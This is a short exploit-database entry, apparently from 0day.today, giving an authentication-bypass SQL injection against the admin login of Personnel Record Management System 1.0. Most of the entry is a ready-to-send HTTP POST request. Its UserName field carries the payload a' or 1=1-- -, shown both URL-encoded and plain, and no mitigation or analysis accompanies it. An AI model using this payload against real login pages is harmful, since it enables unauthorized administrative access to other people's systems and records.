id: 36487
date: 06/28/2021
title: Personnel Record Management System 1.0 SQL Injection Vulnerability
author: Richard Jones
cves: 

# Exploit Title: Personnel Record Management System | Admin Bypass (sqli)
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/5107/record-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5107&title=Record+Management+System+in+PHP+Free+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Exploit:
-------------------------------------------------------------------------------------------------
POST /Personnel_record_management_system/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Personnel_record_management_system/
Cookie: PHPSESSID=8bkj7jlpmlbuqtnti8urp7qcmo
Upgrade-Insecure-Requests: 1

UserName=a%27+or+1%3D1--+-&Password=a&Login=

-------------------------------------------------------------------------------------------------



Unencoded: a'or 1=1-- -

#  0day.today [2023-03-22]  #